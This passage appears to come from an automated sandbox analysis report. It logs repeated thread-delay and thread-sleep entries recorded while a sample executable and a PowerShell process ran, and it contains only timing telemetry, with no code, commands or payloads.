Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598056	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597934	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 594584	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599984
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599525
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599421
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599311
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599202
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598640
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598524
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598415
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598311
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598093
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597982
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597870
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597542
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597432
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597208
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597078
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596968
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596857
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596749
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596640
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596405
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596181
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596077
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595857
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595749
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Window / User API: threadDelayed 6236	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Window / User API: threadDelayed 3546	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7603	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1186	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Window / User API: threadDelayed 3111	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Window / User API: threadDelayed 3283	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6132
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2827
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Window / User API: threadDelayed 4521
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Window / User API: threadDelayed 5208
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6751
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2259

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7484	Thread sleep count: 6236 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7484	Thread sleep count: 3546 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99847s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99491s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99262s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99149s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -99004s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98652s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -98092s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -97109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599724s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -599029s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -597827s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7528	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep count: 7603 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7560	Thread sleep count: 1186 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8024	Thread sleep count: 3111 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8024	Thread sleep count: 3283 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99726s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99389s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -98844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599717s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599389s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -598056s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -597934s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8040	Thread sleep time: -594584s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep count: 6132 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep count: 2827 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 916	Thread sleep count: 4521 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 916	Thread sleep count: 5208 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep count: 33 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99854s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99735s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99610s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99469s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99359s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99249s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99141s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -99020s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599984s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599525s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599421s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599311s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599202s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -599093s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598874s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598640s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598524s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598415s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598311s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -598093s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597982s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597870s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597765s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597542s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597432s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597208s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -597078s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596968s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596857s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596749s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596640s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596405s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596181s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -596077s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -595857s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -595749s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5700	Thread sleep time: -595530s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep count: 6751 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep count: 2259 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736	Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99847	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99719	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99609	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99491	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99375	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99262	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99149	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99004	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98764	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98652	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98531	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98312	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98092	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97984	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97874	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97655	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97546	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97437	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97328	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97218	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 97109	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599984	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599724	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599374	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599155	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599029	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598702	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598374	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597827	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
